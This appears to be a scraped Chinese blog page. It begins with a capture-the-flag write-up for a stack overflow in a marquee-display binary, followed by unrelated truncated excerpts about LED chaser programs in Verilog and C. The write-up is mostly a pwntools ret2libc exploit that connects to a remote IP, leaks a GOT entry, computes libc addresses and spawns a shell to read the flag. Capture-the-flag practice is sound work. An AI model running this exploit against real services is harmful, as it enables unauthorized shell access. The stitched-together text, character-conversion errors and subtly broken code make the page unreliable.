簡單的程式,開始執行後會有乙個跑馬燈滾動。
反編譯看源**發現,跑馬燈滾動三輪後有個短暫停頓,可以利用停頓間隔進行棧溢位。
from pwn import *
import time
context.log_level='debug'
r = remote("220.249.52.133",51688)
#r = process("./format",shell = true) #executes the binary
r.recvuntil("\n\n")
e = elf("./format")
libc=elf("./libc_32.so.6")
writeplt = e.symbols['write']
writegot = e.got['write']
readplt = e.symbols['read']
readgot = e.got['read']
main = e.symbols['gee']
payload1 = "a" * 140 + p32(writeplt) + p32(main) + p32(1) + p32(readgot) + p32(4)
r.sendline(payload1 ) #feeds the exploit to the binary
a=unpack(r.recv(4)) #gets the four bytes we leaked from the got
print hex(a)
libc_base = a - libc.symbols['read']
success('libcbase:'+hex(libc_base))
libc.address = libc_base
system_address = libc.symbols['system']
binsh_address = libc.search('/bin/sh').next()
r.sendline("a"*140 + pack(system_address)+ "bbbb"+ pack(binsh_address))
r.sendline("cat flag")
r.recvuntil("}\n")
r.close()
呼吸流水燈
實現剛開始第乙個燈做完呼吸後左移,到達最右邊後回來,如此反覆。由於 需求,在每個計數器到達最大時設定乙個標誌位便於觀察。分析 的編寫 module xunhuan1 input wire clk input wire rst n output reg 3 0 led reg 5 0 cnt us r...
流水燈程式
流水燈程式 實現從左往右間隔一秒,再實現從右往左間隔一秒 c語言程式如下 include include define uchar unsigned char define uint unsigned int void delay uint z main uchar aa uint i 0 whil...
流水燈製作
今天的電路和昨天的led1一樣,只是多了幾個,好像不是幾個,是好幾個。電路分析就不做了,就是給高電平導通,二極體發光就行了。沒有太大的可說性。直接上程式了。include sbit led1 pa0 sbit led2 pa1 sbit led3 pa2 sbit led4 pa3 sbit led...